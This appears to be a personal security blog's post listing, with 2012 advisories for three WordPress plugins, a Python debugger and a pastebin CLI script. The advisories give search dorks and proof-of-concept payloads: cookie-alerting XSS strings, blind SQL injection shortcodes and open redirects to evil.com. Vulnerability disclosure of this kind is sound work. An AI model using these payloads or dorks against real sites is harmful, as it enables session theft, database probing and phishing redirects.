Welcome to Cloudberry Engineering
a notebook on building, breaking and securing systems.
by Gianluca Brindisi
Gianluca Brindisi 
  • # Exploit Title: WordPress uCan Post plugin <= 1.0.09 Stored XSS
# Dork: inurl:/wp-content/plugins/ucan-post/
# Date: 2012/01/18
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip
# Version: 1.0.09

    Vulnerability

    You need permissions to publish a post from the public interface: The submission form is not well sanitized and will result in stored xss in admin pages:

    • Name field is not sanitized and it’s injectable with a payload which will be stored in the pending submission page in admin panel POC: myname’"><script>window.alert(document.cookie)</script>

    • Email field is not sanitized but can it will check for a valid email address so the maximum result will be a reflected xss POC: my@mail.com’"><script>window.alert(document.cookie)</script>

    • Post Title is not sanitized and it’s injectable with a payload which will be stored in the pending submissions page in admin panel POC: title’"><script>window.alert(document.cookie)</script>

    # / #wordpress #advisory #stored-xss 
  • # Exploit Title: WordPress Age Verification plugin <= 0.4 Open Redirect
# Date: 2012/01/10
# Dork: inurl:wp-content/plugins/age-verification/age-verification.php
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/age-verification.zip
# Version: 0.4

    1. Via GET: http://server/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com The rendered page will provide a link to http://www.evil.com

    2. Via POST: http://server/wp-content/plugins/age-verification/age-verification.php redirect_to: http://www.evil.com age_day: 1 age_month: 1 age_year: 1970 Direct redirect to http://www.evil.com

    # / #wordpress #advisory #open-redirect 
  • # Exploit Title: WordPress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012
# Author: Gianluca Brindisi (g@brindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip
# Version: 1.1

    1) Blind SQL Injection in shortcode:

    Short code parameter ‘id’ is prone to blind sqli, you need to be able to write a post/page to exploit this:

    [paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]

    2) Multiple XSS in pay.php

    http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php

    After connecting to twitter:

    ?link=&22></input>[XSS]

    After submitting the tweet:

    ?title=[XSS]&dl=[REDIRECT-TO-URL]')")[XSS]

    The final download link will be replaced with [REDIRECT-TO-URL]

    POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"<script>alert(document.cookie)</script>

    # / #wordpress #advisory #sql-injection #xss

  • Simple Debugger (sdbg) is a minimal Windows debugger I wrote to sharpen my knowledge of debugging practices.

    It’s written in python and it’s obviously coded on top of the wonderful ctypes library. The overall architecture is heavily based on PyDbg since I was already familiar.

    At the moment of this writing it’s capable of setting soft, hard and memory breakpoints, it has a minimal interactive shell to retrieve registers status and it’s expandable with custom callbacks for handling exceptions.

    Building a debugger it’s been an awesome experience (except for the parts where I am swearing on the IA32 Intel docs) and I really learned a lot - and this was the main goal.

    Since I am starting to wet my feet in reverse engineering I am looking to eat my own dogfood and use it for analysing some samples from my malware collection. This way I hope to keep it updated and maybe add some new features too.

    As usual everything is GPLd and you can find it on my bitbucket page.

    # / #python #debugging #reverse-engineering
  • Introducing xsssniper
  • Tor + Polipo on OpenBSD

  • Since I haven’t managed to find a command line pastebin script whose based on the new APIs I wrote one.

    You can find it on my bitbucket.

    Usage:

    $ pastebin.py -f python -e 10M -p 1 -t MyPaste &lt; whatever

    Pratically you just pipe your data to the script.

    Here are some options:

    -f defines data format (php, python, etc)
-e the expiry time (10M, 1G, 1D, N)
-p the privacy (1 is private, 0 is public)
-t the title of the paste

    The script looks for a config file in your home dir with your dev API key and optionally an username and a valid password (without valid login credentials your pastes will be anonymous).

    The first time you run it will create the config (~/.pastebin).

    Feel free to fork/edit/whatever it.

    # / #python #cli #pastebin
  • Run Xmonad on Snow Leopard
  • Introducing Pepbot
  • How To Automate SSH With Expect